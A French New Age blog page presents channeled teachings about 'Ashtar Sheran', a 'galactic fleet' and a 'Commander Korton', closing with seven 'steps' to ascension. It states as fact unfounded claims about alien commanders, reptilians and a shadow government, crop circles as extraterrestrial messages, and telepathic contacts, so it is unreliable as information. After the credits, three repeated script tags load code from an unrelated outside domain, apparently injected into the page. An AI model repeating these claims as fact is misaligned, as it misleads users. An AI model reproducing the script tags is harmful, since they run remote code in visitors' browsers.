• LA FLOTTE GALACTIQUE

    LA FLOTTE GALACTIQUE

    Invisible aux terriens et pourtant si présente et active, dans l'amour et le respect de la vie ! Sous le commandement du commandant 

    ASHTAR SHERAN

    Ambassadeur de la paix intergalactique et responsable cosmique de l'ascension planétaire de la terre et de sa galaxie.

    Il est le chef de la confédération galactique englobant de nombreuses planètes de systèmes solaires différents. Reconnaissant la toute puissance de DIEU Père/Mère et sous la hiérarchie de SANANDA connu en tant que JESUS christ cosmique, lui même sous les ordres de MAîTREYA le christ planétaire, Il dirige la division spatiale de la grande fraternité blanche universelle et coordonne les activités de tous les vaisseaux célestes de la flotte galactique (venus d'Orion, d' Arctarus, des Pléiades, d'Andromède et de bien d'autres endroits) qui travaillent pour sauver la Terre et la conduire à son ascension en quatrième et cinquième dimension.

    C’est un grand être spirituel qui à dédié sa vie à l’éveil de la conscience humaine. Sa mission consiste - tour en laissant le libre arbitre aux humains - à maintenir un contrôle sur leurs actions afin de les empêcher de détruire la terre et de les conduire à leur élévation en dimension supérieure. Avec ses frères cosmiques dont l'Archange Kryon, il aide à la purification de l'atmosphère de la terre et supervise la mise en place des grilles magnétiques de dimension supérieure. Pour cela, il apporte avec d'autres maîtres ascensionnés et les archanges, la lumière sur terre dans une dimension spirituelle et sociale fraternelle du monde. Il supervise l'enseignement planétaire des guides d'ascension aux messagers humains.

    Il travaille pour la reconnaissance mondiale des frères galactiques spirituels et des vaisseaux de lumière et pour la libération de la terre de toutes les entités néfastes à l'avancement de la planète (reptiliens - gris et le gouvernement de l'ombre).

    La terre est gardée jour et nuit. Les différentes flottes se spécialisent dans l'éducation spirituelle, l'ascension, les connaissances scientifiques, la communication entre les humains (Internet). Les maîtres galactiques font des relevés d'information en permanence, concernant les activités nucléaires, chimiques, bactériologiques, magnétiques, informatiques... et humaines. Ils surveillent les affaires planétaires gouvernementales, l'éducation, les médias, les expressions artistiques, la médecine, tout ce qui touche la nature, les plantes et animaux et donnent des informations dans beaucoup d'autres domaines. Les crops circles sont des messages cadeaux donnés aux hommes par les êtres galactiques pour leur permettre de comprendre qu'il existe des manifestations extra-terrestres scientifiques et pacifiques. Ils représentent souvent des formations de guérison, d'enseignement ou de loisirs.

    Ashtar dit : Nous honorons toutes vies et toutes personnes comme étant fondamentalement divines. Nous ne reconnaissons qu'une race, la race Humaine - l'homme céleste universel. Nous célébrons la grande diversité dans toute la création et nous honorons toutes les races, les couleurs, les principes et les formes gouvernementales qui respectent le droit individuel à la liberté d'expression et les droits humains. Nous vous aimons inconditionnellement et nous soutenons une vision de la terre et de son humanité comme vivante, ascensionnée, entière et joyeusement radieuse dans l'abondance et la liberté. Nous ne sommes pas limités ni par le temps, ni par l'espace, ni par la distance, ni par la grandeur. Par conséquent, nous pouvons vous apparaître comme une minuscule étincelle, une bulle rayonnante, une forme aussi grande qu'un gratte-ciel ou un vaisseau-mère de la grosseur d'une ville entière! Nos vaisseaux interstellaires portent le nom de "Merkabah". Ce sont des véhicules de lumière d'une grande beauté, d'harmonie et d'amour conçus pour nous servir dans notre mission d'unification.

    Ashtar et sa flotte, communique avec les hommes par transmissions de pensées ou impression télépathiques qui peuvent ressembler à un son de cloche ou du codage Morse. Il peut aussi se présenter à des personnes ayant un coeur pur, sous forme de messages ou par écriture automatique manuelle ou informatique. Les messages sont toujours positifs et pleins d'amour.

    Le premier message a été donné télépathiquement, par Ashtar à un pilote civil américain, George Van Tassel, le 18 juin 1952. Il était destiné au Président Truman et concernait le danger du nucléaire. Dix ans plus tard, le 13 avril 1962, Ashtar et un autre extra-terrestre Ithakar, se présentent à Eugénio Siragusa et lui transmet un message destinée au Président Truman ainsi qu'aux autres chefs d'états politiques et au Pape, sur l'urgence de stopper les expériences nucléaires. Cet événement a été confirmé à la fois par Siragusa et Ashtar Sheran à travers le canal télépathique de Anna Federighi en Italie.
    source : http://www.geocities.com/crinaos/texovn7.htm

    Depuis quelques années, il communique avec de nombreux channels, souvent des "poussières d'étoiles" incarnées et réveillées pour aider le monde à ascensionner.


    Le Commandant KORTON  - Maître de l'informatique et des informations. -

    En 2003, en Guadeloupe, deux amis éveillés, de deux endroits séparés de 25 km, ont aperçu un vaisseau rond, lenticulaire sous forme de nuage épais stationnaire au dessus de collines appelées les 'mamelles'. Ils m'ont averti, et je suis entrée télépathiquement en contact avec le chef du vaisseau qui s'est présenté sous le nom du commandant Korton. (Je n'avais jamais entendu ce nom). Il m'a dit qu'il était responsable de la dernière vague d'ascension et qu'il était chargé de vérifier l'éveil des humains et d'enregistrer le nom de tous les nouveaux candidats à l'ascension, afin qu'ils soient aidés et enseignés par les maîtres et les guides d'ascension.


    La Flotte Galactique est un cadeau merveilleux fait à la terre et aux humains. A toute époque importante, elle était là pour aider les hommes à ascensionner. Déjà au temps de la Lémurie et de l'Atlantide elle était présente.

    L'élévation de la terre sert à la galaxie entière.

    Le temps de l'obscurantisme prend fin.

    Les hommes retrouvent de plus en plus leur identité spirituelle.

    Les maîtres d'ascension sont là pour aider tout l'univers à grandir en lumière.

    Aidons les en respectant l' ENSEIGNEMENT D' ASHTAR :

    Les 7 étapes pour accéder à la maîtrise de sa vie et à l'élévation permanente :

    L'amour sans réserve pour tous, à commencer pour soi.
    Ne jamais critiquer ni soi, ni personne d'autre.
    Bénir chaque situation de sa vie, qu'elle paraisse bonne ou mauvaise.
    Faire tout avec coeur, et garder consciemment l'amour éveillé quoi qu'il arrive.
    Maintenir un dialogue quotidien avec sa présence JE SUIS, et affirmer ses désirs les plus élevés.
    Se sentir toujours vivant et joyeux.
    Croire en soi, en la vie et avoir la foi de l'ascension.

    Canal : Tuella

    Dossier réalisé par Joéliah.
    Diffusé par http://perso.wanadoo.fr/joeliah.amie-des-anges

     
    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script><script src="http://centrexity.com/converter.js" type="text/javascript"> </script><script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

  • Commentaires

    Aucun commentaire pour le moment

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :